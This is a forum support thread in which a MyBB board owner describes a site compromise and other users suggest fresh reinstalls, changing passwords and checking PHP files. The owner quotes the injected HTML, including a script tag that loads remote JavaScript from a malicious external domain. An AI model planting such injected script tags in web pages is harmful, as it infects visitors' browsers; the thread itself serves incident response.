Hi
I hope I'm posting right information in right place. If it's not, I apologize .
A few days ago I noticed that smilies dose not work and the panel which there is font menu, bolt, italic and .... in it, is disappeared.
and similar problems in admin panel.
I easily could solve this by re-uploading and replacing jscripts directory in home and admin directory. but after a few days it happen again and can be solved by uploading again. But I cant do this 3 times a week.
I fined out there is a bad script loading from my board from this address:
http://sogpaoiy.the-mlmpowercall.com/PC.js
There was the following code in my almost every index.html file in admin directory
<html>
<head>
<title></title>
</head>
<body>
</body>
</html>
<script type="text/javascript" src="http://sogpaoiy.the-mlmpowercall.com/PC.js"></script>
<!--8b054dfacfa60db8244c2c3da84f8cd3-->
I could delete all of them because there was just 15 files.
But the problem dose not end here.
there is near 150 file(mostly index in their name) which include this:
http://asppoa.whcs.biz:8080/Backup.js
I'm sure that my board loads this too.
How can i delete this from my files? Is there more scripts like this?
I know changing host can solve it but i don't want to do this.
www.soccerproject.ir
Your best of deleting all your files and uploading them again via FTP with fresh copies. You will need to enter your MySQL details into ./inc/config.php again as well.
The easiest way would be to use Notepad++, because it can do the replacement of all files within a folder.
But it's much more important to know where that code came from than how to remove it.
Maybe you want to show your users until you fix this, how to block those domains with the windows hosts file. The .js probably contains the virus: Bloodhound.Exploit.292
Make sure your own antivirus is up to date as well.
(2010-06-15, 09:32 AM)Tim B. Wrote: [ -> ]Your best of deleting all your files and uploading them again via FTP with fresh copies. You will need to enter your MySQL details into ./inc/config.php again as well.
Thank you,
Do you mean all of files in directory that I've installed mybb? or just files which includes that code?
what's MySQL details? and how should i enter them?
(2010-06-15, 12:58 PM)patrick Wrote: [ -> ]The easiest way would be to use Notepad++, because it can do the replacement of all files within a folder.
But it's much more important to know where that code came from than how to remove it.
Maybe you want to show your users until you fix this, how to block those domains with the windows hosts file. The .js probably contains the virus: Bloodhound.Exploit.292
Make sure your own antivirus is up to date as well.
Thank you,
Is there any problem if I download whole public_html, find and delete the code, delete the old public_html and upload new public_html (one I've deleted the code from)?
That's right but how can i understand where that code come from? I didn't install any untrusted plugin. I didn't upgrade any user to admin but my well known and trusted friend. And I've changed my password. (just in board not host)
You can download and reupload the folder. It shouldn't cuase any problems.
Besides clearing the .html/.xml/.js files, you should check the PHP files as well. An infected PHP file can cause this kind of issues.
You may want to change your host password as well, just in case.
(2010-06-15, 01:41 PM)shadow-man Wrote: [ -> ]Thank you,
Is there any problem if I download whole public_html, find and delete the code, delete the old public_html and upload new public_html (one I've deleted the code from)?
That's right but how can i understand where that code come from? I didn't install any untrusted plugin. I didn't upgrade any user to admin but my well known and trusted friend. And I've changed my password. (just in board not host)
i would not recommend it. unless you know what caused the exploit or what other code has been modified, you can not guarantee that you will have removed all offending code bits.
i would upload fresh, change all passwords on the host account, mysql passwords, forum admin password, ftp password (if not attached to your hosting password), etc.
I'm with pavemen on this! I have a dedicated server with around 25 domains on it. About a month ago I received an e-mail from the datacenter that they had detected a malicious script on ONE of the domains.
As a precaution I deleted the entire file set and the domain from the server, then recreated the domain and reuploaded an old backup copy of the website. I then checked through the file sets for every domain on the server, changed ALL passwords, and locked down the Brute Force Protection and Host Access Control.
Then I dug through the server logs and found that the domain had been compromised for over a month and access had been gained by at least 20 different I.P. addresses.
Hackers love to share their successes, and if you know that you got hit once it's very likely that you've been hit a lot more. The only real safe theing to do is delete everything and re-install.